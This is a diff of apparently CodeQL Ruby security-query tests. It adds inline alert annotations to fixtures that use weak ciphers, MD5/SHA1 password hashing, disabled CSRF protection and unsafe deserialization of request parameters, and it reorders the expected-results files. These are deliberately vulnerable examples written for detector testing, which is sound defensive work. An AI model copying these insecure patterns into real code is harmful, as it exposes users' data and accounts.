a/ruby/ql/test/query-tests/security/cwe-327/BrokenCryptoAlgorithm.qlref +++ b/ruby/ql/test/query-tests/security/cwe-327/BrokenCryptoAlgorithm.qlref @@ -1 +1,2 @@ -queries/security/cwe-327/BrokenCryptoAlgorithm.ql \ No newline at end of file +query: queries/security/cwe-327/BrokenCryptoAlgorithm.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.expected b/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.expected index 0ad72554019f..30e754c63d0d 100644 --- a/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.expected +++ b/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.expected @@ -1,3 +1,11 @@ +#select +| weak_hashing.rb:10:23:10:30 | password | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:10:23:10:30 | password | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | +| weak_hashing.rb:11:32:11:39 | password | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:11:32:11:39 | password | $@ is used in a hashing algorithm (SHA1) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | +| weak_hashing.rb:12:23:12:30 | username | weak_hashing.rb:4:1:4:8 | username | weak_hashing.rb:12:23:12:30 | username | $@ is used in a hashing algorithm (MD5) that is insecure. | weak_hashing.rb:4:1:4:8 | username | Sensitive data (id) | +| weak_hashing.rb:13:23:13:23 | x | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:13:23:13:23 | x | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | +| weak_hashing.rb:24:23:24:36 | call to get_password | weak_hashing.rb:24:23:24:36 | call to get_password | weak_hashing.rb:24:23:24:36 | call to get_password | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:24:23:24:36 | call to get_password | Sensitive data (password) | +| weak_hashing.rb:28:23:28:42 | ...[...] | weak_hashing.rb:28:23:28:42 | ...[...] | weak_hashing.rb:28:23:28:42 | ...[...] | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:28:23:28:42 | ...[...] | Sensitive data (password) | +| weak_hashing.rb:32:25:32:38 | password_param | weak_hashing.rb:30:25:30:38 | password_param | weak_hashing.rb:32:25:32:38 | password_param | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:30:25:30:38 | password_param | Sensitive data (password) | edges | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:6:1:6:1 | x | provenance | | | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:10:23:10:30 | password | provenance | | @@ -18,11 +26,3 @@ nodes | weak_hashing.rb:30:25:30:38 | password_param | semmle.label | password_param | | weak_hashing.rb:32:25:32:38 | password_param | semmle.label | password_param | subpaths -#select -| weak_hashing.rb:10:23:10:30 | password | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:10:23:10:30 | password | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | -| weak_hashing.rb:11:32:11:39 | password | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:11:32:11:39 | password | $@ is used in a hashing algorithm (SHA1) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | -| weak_hashing.rb:12:23:12:30 | username | weak_hashing.rb:4:1:4:8 | username | weak_hashing.rb:12:23:12:30 | username | $@ is used in a hashing algorithm (MD5) that is insecure. | weak_hashing.rb:4:1:4:8 | username | Sensitive data (id) | -| weak_hashing.rb:13:23:13:23 | x | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:13:23:13:23 | x | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | -| weak_hashing.rb:24:23:24:36 | call to get_password | weak_hashing.rb:24:23:24:36 | call to get_password | weak_hashing.rb:24:23:24:36 | call to get_password | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:24:23:24:36 | call to get_password | Sensitive data (password) | -| weak_hashing.rb:28:23:28:42 | ...[...] | weak_hashing.rb:28:23:28:42 | ...[...] | weak_hashing.rb:28:23:28:42 | ...[...] | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:28:23:28:42 | ...[...] | Sensitive data (password) | -| weak_hashing.rb:32:25:32:38 | password_param | weak_hashing.rb:30:25:30:38 | password_param | weak_hashing.rb:32:25:32:38 | password_param | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:30:25:30:38 | password_param | Sensitive data (password) | diff --git a/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.qlref b/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.qlref index dcb5a4e62a7e..b4891bf7bcab 100644 --- a/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.qlref +++ b/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.qlref @@ -1 +1,2 @@ -queries/security/cwe-327/WeakSensitiveDataHashing.ql \ No newline at end of file +query: queries/security/cwe-327/WeakSensitiveDataHashing.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-327/broken_crypto.rb b/ruby/ql/test/query-tests/security/cwe-327/broken_crypto.rb index 69dcd6b472bb..a9965a250f00 100644 --- a/ruby/ql/test/query-tests/security/cwe-327/broken_crypto.rb +++ b/ruby/ql/test/query-tests/security/cwe-327/broken_crypto.rb @@ -1,19 +1,19 @@ require 'openssl' # BAD: creating a cipher using a weak scheme -weak = OpenSSL::Cipher.new('des3') +weak = OpenSSL::Cipher.new('des3') # $ Alert[rb/weak-cryptographic-algorithm] weak.encrypt weak.random_key # BAD: encrypting data using a weak cipher -weak.update('foo') +weak.update('foo') # $ Alert[rb/weak-cryptographic-algorithm] weak.final # BAD: creating a cipher using a weak block mode -weak = OpenSSL::Cipher::AES.new(128, 'ecb') +weak = OpenSSL::Cipher::AES.new(128, 'ecb') # $ Alert[rb/weak-cryptographic-algorithm] weak.encrypt weak.random_key # BAD: encrypting data using a weak block mode -weak.update('foo') +weak.update('foo') # $ Alert[rb/weak-cryptographic-algorithm] weak.final # GOOD: creating a cipher using a strong scheme @@ -25,7 +25,7 @@ strong.final # BAD: weak block mode -OpenSSL::Cipher::AES.new(128, :ecb) +OpenSSL::Cipher::AES.new(128, :ecb) # $ Alert[rb/weak-cryptographic-algorithm] # GOOD: strong encryption algorithm OpenSSL::Cipher::AES.new(128, 'cbc') # GOOD: strong encryption algorithm @@ -34,49 +34,49 @@ # GOOD: strong encryption algorithm OpenSSL::Cipher::AES128.new # BAD: weak block mode -OpenSSL::Cipher::AES128.new 'ecb' +OpenSSL::Cipher::AES128.new 'ecb' # $ Alert[rb/weak-cryptographic-algorithm] # GOOD: strong encryption algorithm OpenSSL::Cipher::AES192.new # BAD: weak block mode -OpenSSL::Cipher::AES192.new 'ecb' +OpenSSL::Cipher::AES192.new 'ecb' # $ Alert[rb/weak-cryptographic-algorithm] # GOOD: strong encryption algorithm OpenSSL::Cipher::AES256.new # BAD: weak block mode -OpenSSL::Cipher::AES256.new 'ecb' +OpenSSL::Cipher::AES256.new 'ecb' # $ Alert[rb/weak-cryptographic-algorithm] # GOOD: strong encryption algorithm OpenSSL::Cipher::BF.new # BAD: weak block mode -OpenSSL::Cipher::BF.new 'ecb' +OpenSSL::Cipher::BF.new 'ecb' # $ Alert[rb/weak-cryptographic-algorithm] # GOOD: strong encryption algorithm OpenSSL::Cipher::CAST5.new # BAD: weak block mode -OpenSSL::Cipher::CAST5.new 'ecb' +OpenSSL::Cipher::CAST5.new 'ecb' # $ Alert[rb/weak-cryptographic-algorithm] # BAD: weak encryption algorithm -OpenSSL::Cipher::DES.new +OpenSSL::Cipher::DES.new # $ Alert[rb/weak-cryptographic-algorithm] # BAD: weak encryption algorithm -OpenSSL::Cipher::DES.new 'cbc' +OpenSSL::Cipher::DES.new 'cbc' # $ Alert[rb/weak-cryptographic-algorithm] # GOOD: strong encryption algorithm OpenSSL::Cipher::IDEA.new # BAD: weak block mode -OpenSSL::Cipher::IDEA.new 'ecb' +OpenSSL::Cipher::IDEA.new 'ecb' # $ Alert[rb/weak-cryptographic-algorithm] # BAD: weak encryption algorithm -OpenSSL::Cipher::RC2.new +OpenSSL::Cipher::RC2.new # $ Alert[rb/weak-cryptographic-algorithm] # BAD: weak encryption algorithm -OpenSSL::Cipher::RC2.new 'ecb' +OpenSSL::Cipher::RC2.new 'ecb' # $ Alert[rb/weak-cryptographic-algorithm] # BAD: weak encryption algorithm -OpenSSL::Cipher::RC4.new +OpenSSL::Cipher::RC4.new # $ Alert[rb/weak-cryptographic-algorithm] # BAD: weak encryption algorithm -OpenSSL::Cipher::RC4.new '40' +OpenSSL::Cipher::RC4.new '40' # $ Alert[rb/weak-cryptographic-algorithm] # BAD: weak encryption algorithm -OpenSSL::Cipher::RC4.new 'hmac-md5' +OpenSSL::Cipher::RC4.new 'hmac-md5' # $ Alert[rb/weak-cryptographic-algorithm] Digest::MD5.hexdigest('foo') # OK: don't report hash algorithm even if it is weak Digest::SHA256.hexdigest('foo') # GOOD: strong hash algorithm diff --git a/ruby/ql/test/query-tests/security/cwe-327/weak_hashing.rb b/ruby/ql/test/query-tests/security/cwe-327/weak_hashing.rb index cff4263c40d8..e1d5eb2645a1 100644 --- a/ruby/ql/test/query-tests/security/cwe-327/weak_hashing.rb +++ b/ruby/ql/test/query-tests/security/cwe-327/weak_hashing.rb @@ -1,16 +1,16 @@ require 'openssl' -password = "abcde" -username = "some_user" +password = "abcde" # $ Source[rb/weak-sensitive-data-hashing] +username = "some_user" # $ Source[rb/weak-sensitive-data-hashing] some_data = "foo" x = password Digest::MD5.hexdigest(some_data) # OK: input is not sensitive Digest::SHA256.hexdigest(password) # OK: strong hash algorithm -Digest::MD5.hexdigest(password) # BAD: weak hash function used for sensitive data -OpenSSL::Digest.digest('SHA1', password) # BAD: weak hash function used for sensitive data -Digest::MD5.hexdigest(username) # BAD: weak hash function used for sensitive data -Digest::MD5.hexdigest(x) # BAD: weak hash function used for sensitive data +Digest::MD5.hexdigest(password) # BAD: weak hash function used for sensitive data # $ Alert[rb/weak-sensitive-data-hashing] +OpenSSL::Digest.digest('SHA1', password) # BAD: weak hash function used for sensitive data # $ Alert[rb/weak-sensitive-data-hashing] +Digest::MD5.hexdigest(username) # BAD: weak hash function used for sensitive data # $ Alert[rb/weak-sensitive-data-hashing] +Digest::MD5.hexdigest(x) # BAD: weak hash function used for sensitive data # $ Alert[rb/weak-sensitive-data-hashing] def get_safe_data() return "hello" @@ -21,13 +21,13 @@ def get_password() end Digest::MD5.hexdigest(get_safe_data()) # OK: input is not sensitive -Digest::MD5.hexdigest(get_password()) # BAD: weak hash function used for sensitive data +Digest::MD5.hexdigest(get_password()) # BAD: weak hash function used for sensitive data # $ Alert[rb/weak-sensitive-data-hashing] some_hash = {password: "changeme", foo: "bar"} Digest::MD5.hexdigest(some_hash[:foo]) # OK: input is not sensitive -Digest::MD5.hexdigest(some_hash[:password]) # BAD: weak hash function used for sensitive data +Digest::MD5.hexdigest(some_hash[:password]) # BAD: weak hash function used for sensitive data # $ Alert[rb/weak-sensitive-data-hashing] -def a_method(safe_data, password_param) +def a_method(safe_data, password_param) # $ Source[rb/weak-sensitive-data-hashing] Digest::MD5.hexdigest(safe_data) # OK: input is not sensitive - Digest::MD5.hexdigest(password_param) # BAD: weak hash function used for sensitive data + Digest::MD5.hexdigest(password_param) # BAD: weak hash function used for sensitive data # $ Alert[rb/weak-sensitive-data-hashing] end diff --git a/ruby/ql/test/query-tests/security/cwe-352/CSRFProtectionDisabled.qlref b/ruby/ql/test/query-tests/security/cwe-352/CSRFProtectionDisabled.qlref index 5dc5050b63e8..7e422be7bf57 100644 --- a/ruby/ql/test/query-tests/security/cwe-352/CSRFProtectionDisabled.qlref +++ b/ruby/ql/test/query-tests/security/cwe-352/CSRFProtectionDisabled.qlref @@ -1 +1,2 @@ -queries/security/cwe-352/CSRFProtectionDisabled.ql \ No newline at end of file +query: queries/security/cwe-352/CSRFProtectionDisabled.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-352/CSRFProtectionNotEnabled.qlref b/ruby/ql/test/query-tests/security/cwe-352/CSRFProtectionNotEnabled.qlref index 8e9e894fe518..a47a9b3e99a4 100644 --- a/ruby/ql/test/query-tests/security/cwe-352/CSRFProtectionNotEnabled.qlref +++ b/ruby/ql/test/query-tests/security/cwe-352/CSRFProtectionNotEnabled.qlref @@ -1 +1,2 @@ -queries/security/cwe-352/CSRFProtectionNotEnabled.ql \ No newline at end of file +query: queries/security/cwe-352/CSRFProtectionNotEnabled.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/alternative_root_controller.rb b/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/alternative_root_controller.rb index 8cbf31529c15..fffa5f05db64 100644 --- a/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/alternative_root_controller.rb +++ b/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/alternative_root_controller.rb @@ -1,3 +1,3 @@ class AlternativeRootController < ActionController::Base # BAD: no protect_from_forgery call -end \ No newline at end of file +end # $ Alert[rb/csrf-protection-not-enabled] \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/application_controller.rb b/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/application_controller.rb index 6ff599938e81..0d98c535a41b 100644 --- a/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/application_controller.rb +++ b/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/application_controller.rb @@ -2,7 +2,7 @@ class ApplicationController < ActionController::Base # BAD: `protect_from_forgery` without `with: :exception` can expose an # application to CSRF attacks in some circumstances - protect_from_forgery + protect_from_forgery # $ Alert[rb/csrf-protection-disabled] before_action authz_guard diff --git a/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/users_controller.rb b/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/users_controller.rb index 596a7b0108ff..1b54c332cd27 100644 --- a/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/users_controller.rb +++ b/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/users_controller.rb @@ -1,7 +1,7 @@ class UsersController < ApplicationController # BAD: Disabling forgery protection may open the application to CSRF attacks - skip_before_action :verify_authenticity_token + skip_before_action :verify_authenticity_token # $ Alert[rb/csrf-protection-disabled] def change_email user = current_user diff --git a/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/application.rb b/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/application.rb index 02b349a16304..5d455ebe347a 100644 --- a/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/application.rb +++ b/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/application.rb @@ -13,6 +13,6 @@ class Application < Rails::Application config.load_defaults 5.1 # BAD: Disabling forgery protection may open the application to CSRF attacks - config.action_controller.allow_forgery_protection = false + config.action_controller.allow_forgery_protection = false # $ Alert[rb/csrf-protection-disabled] end end diff --git a/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/environments/development.rb b/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/environments/development.rb index a61bc6382b6f..968227d5e330 100644 --- a/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/environments/development.rb +++ b/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/environments/development.rb @@ -2,5 +2,5 @@ # Settings specified here will take precedence over those in config/application.rb. # GOOD: disabling CSRF protection in the development environment should not be flagged - config.action_controller.allow_forgery_protection = false + config.action_controller.allow_forgery_protection = false # $ Alert[rb/csrf-protection-disabled] end diff --git a/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/environments/production.rb b/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/environments/production.rb index 1a80e8503a60..384097fccf05 100644 --- a/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/environments/production.rb +++ b/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/environments/production.rb @@ -2,5 +2,5 @@ # Settings specified here will take precedence over those in config/application.rb. # BAD: Disabling forgery protection may open the application to CSRF attacks - config.action_controller.allow_forgery_protection = false + config.action_controller.allow_forgery_protection = false # $ Alert[rb/csrf-protection-disabled] end diff --git a/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/OjGlobalOptions.rb b/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/OjGlobalOptions.rb index 3ec21d778c15..ffaa4107231b 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/OjGlobalOptions.rb +++ b/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/OjGlobalOptions.rb @@ -10,7 +10,7 @@ def route0 # BAD - the safe mode set globally is overridden with an unsafe mode passed as # a call argument def route1 - json_data = params[:key] - object = Oj.load json_data, mode: :object + json_data = params[:key] # $ Source + object = Oj.load json_data, mode: :object # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.expected b/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.expected index 44f54744e4b1..9d220826b1cd 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.expected +++ b/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.expected @@ -1,3 +1,5 @@ +#select +| OjGlobalOptions.rb:14:22:14:30 | json_data | OjGlobalOptions.rb:13:17:13:22 | call to params | OjGlobalOptions.rb:14:22:14:30 | json_data | Unsafe deserialization depends on a $@. | OjGlobalOptions.rb:13:17:13:22 | call to params | user-provided value | edges | OjGlobalOptions.rb:13:5:13:13 | json_data | OjGlobalOptions.rb:14:22:14:30 | json_data | provenance | | | OjGlobalOptions.rb:13:17:13:22 | call to params | OjGlobalOptions.rb:13:17:13:28 | ...[...] | provenance | | @@ -8,5 +10,3 @@ nodes | OjGlobalOptions.rb:13:17:13:28 | ...[...] | semmle.label | ...[...] | | OjGlobalOptions.rb:14:22:14:30 | json_data | semmle.label | json_data | subpaths -#select -| OjGlobalOptions.rb:14:22:14:30 | json_data | OjGlobalOptions.rb:13:17:13:22 | call to params | OjGlobalOptions.rb:14:22:14:30 | json_data | Unsafe deserialization depends on a $@. | OjGlobalOptions.rb:13:17:13:22 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.qlref b/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.qlref index 55f7c440b46e..12e3c7a9b6ca 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.qlref +++ b/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.qlref @@ -1 +1,2 @@ -queries/security/cwe-502/UnsafeDeserialization.ql +query: queries/security/cwe-502/UnsafeDeserialization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/OxGlobalOptions.rb b/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/OxGlobalOptions.rb index 02adc167dab1..d43d9cb9173c 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/OxGlobalOptions.rb +++ b/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/OxGlobalOptions.rb @@ -3,8 +3,8 @@ class UsersController < ActionController::Base # BAD - Ox.load is unsafe when the mode :object is set globally def route0 - xml_data = params[:key] - object = Ox.load xml_data + xml_data = params[:key] # $ Source + object = Ox.load xml_data # $ Alert end # GOOD - the unsafe mode set globally is overridden with an insecure mode passed as diff --git a/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.expected b/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.expected index 4fa7c85df052..a7fd344d2865 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.expected +++ b/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.expected @@ -1,3 +1,5 @@ +#select +| OxGlobalOptions.rb:7:22:7:29 | xml_data | OxGlobalOptions.rb:6:16:6:21 | call to params | OxGlobalOptions.rb:7:22:7:29 | xml_data | Unsafe deserialization depends on a $@. | OxGlobalOptions.rb:6:16:6:21 | call to params | user-provided value | edges | OxGlobalOptions.rb:6:5:6:12 | xml_data | OxGlobalOptions.rb:7:22:7:29 | xml_data | provenance | | | OxGlobalOptions.rb:6:16:6:21 | call to params | OxGlobalOptions.rb:6:16:6:27 | ...[...] | provenance | | @@ -8,5 +10,3 @@ nodes | OxGlobalOptions.rb:6:16:6:27 | ...[...] | semmle.label | ...[...] | | OxGlobalOptions.rb:7:22:7:29 | xml_data | semmle.label | xml_data | subpaths -#select -| OxGlobalOptions.rb:7:22:7:29 | xml_data | OxGlobalOptions.rb:6:16:6:21 | call to params | OxGlobalOptions.rb:7:22:7:29 | xml_data | Unsafe deserialization depends on a $@. | OxGlobalOptions.rb:6:16:6:21 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.qlref b/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.qlref index 55f7c440b46e..12e3c7a9b6ca 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.qlref +++ b/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.qlref @@ -1 +1,2 @@ -queries/security/cwe-502/UnsafeDeserialization.ql +query: queries/security/cwe-502/UnsafeDeserialization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.expected b/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.expected index b99b2e7c7810..b20b5e8b30e6 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.expected +++ b/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.expected @@ -1,3 +1,31 @@ +#select +| UnsafeDeserialization.rb:12:27:12:41 | serialized_data | UnsafeDeserialization.rb:11:39:11:44 | call to params | UnsafeDeserialization.rb:12:27:12:41 | serialized_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:11:39:11:44 | call to params | user-provided value | +| UnsafeDeserialization.rb:18:30:18:44 | serialized_data | UnsafeDeserialization.rb:17:39:17:44 | call to params | UnsafeDeserialization.rb:18:30:18:44 | serialized_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:17:39:17:44 | call to params | user-provided value | +| UnsafeDeserialization.rb:24:24:24:32 | json_data | UnsafeDeserialization.rb:23:17:23:22 | call to params | UnsafeDeserialization.rb:24:24:24:32 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:23:17:23:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:30:27:30:35 | json_data | UnsafeDeserialization.rb:29:17:29:22 | call to params | UnsafeDeserialization.rb:30:27:30:35 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:29:17:29:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:42:24:42:32 | yaml_data | UnsafeDeserialization.rb:41:17:41:22 | call to params | UnsafeDeserialization.rb:42:24:42:32 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:41:17:41:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:54:22:54:30 | json_data | UnsafeDeserialization.rb:53:17:53:22 | call to params | UnsafeDeserialization.rb:54:22:54:30 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:53:17:53:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:55:22:55:30 | json_data | UnsafeDeserialization.rb:53:17:53:22 | call to params | UnsafeDeserialization.rb:55:22:55:30 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:53:17:53:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:70:23:70:31 | json_data | UnsafeDeserialization.rb:60:17:60:22 | call to params | UnsafeDeserialization.rb:70:23:70:31 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:60:17:60:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:82:28:82:36 | json_data | UnsafeDeserialization.rb:81:16:81:21 | call to params | UnsafeDeserialization.rb:82:28:82:36 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:81:16:81:21 | call to params | user-provided value | +| UnsafeDeserialization.rb:88:26:88:33 | xml_data | UnsafeDeserialization.rb:87:15:87:20 | call to params | UnsafeDeserialization.rb:88:26:88:33 | xml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:87:15:87:20 | call to params | user-provided value | +| UnsafeDeserialization.rb:94:22:94:29 | xml_data | UnsafeDeserialization.rb:93:16:93:21 | call to params | UnsafeDeserialization.rb:94:22:94:29 | xml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:93:16:93:21 | call to params | user-provided value | +| UnsafeDeserialization.rb:110:34:110:36 | xml | UnsafeDeserialization.rb:109:11:109:16 | call to params | UnsafeDeserialization.rb:110:34:110:36 | xml | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:109:11:109:16 | call to params | user-provided value | +| UnsafeDeserialization.rb:116:25:116:33 | yaml_data | UnsafeDeserialization.rb:115:17:115:22 | call to params | UnsafeDeserialization.rb:116:25:116:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:115:17:115:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:123:25:123:33 | yaml_data | UnsafeDeserialization.rb:122:17:122:22 | call to params | UnsafeDeserialization.rb:123:25:123:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:122:17:122:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:138:32:138:40 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:138:32:138:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:139:37:139:45 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:139:37:139:45 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:140:32:140:40 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:140:32:140:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:142:14:142:33 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:142:14:142:33 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:143:14:143:43 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:143:14:143:43 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:144:14:144:48 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:144:14:144:48 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:150:30:150:39 | plist_data | UnsafeDeserialization.rb:149:18:149:23 | call to params | UnsafeDeserialization.rb:150:30:150:39 | plist_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:149:18:149:23 | call to params | user-provided value | +| UnsafeDeserialization.rb:151:30:151:39 | plist_data | UnsafeDeserialization.rb:149:18:149:23 | call to params | UnsafeDeserialization.rb:151:30:151:39 | plist_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:149:18:149:23 | call to params | user-provided value | +| UnsafeDeserialization.rb:161:24:161:34 | call to read | UnsafeDeserialization.rb:161:24:161:34 | call to read | UnsafeDeserialization.rb:161:24:161:34 | call to read | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:161:24:161:34 | call to read | value from stdin | +| UnsafeDeserialization.rb:164:24:164:33 | call to gets | UnsafeDeserialization.rb:164:24:164:33 | call to gets | UnsafeDeserialization.rb:164:24:164:33 | call to gets | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:164:24:164:33 | call to gets | value from stdin | +| UnsafeDeserialization.rb:167:24:167:32 | call to read | UnsafeDeserialization.rb:167:24:167:32 | call to read | UnsafeDeserialization.rb:167:24:167:32 | call to read | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:167:24:167:32 | call 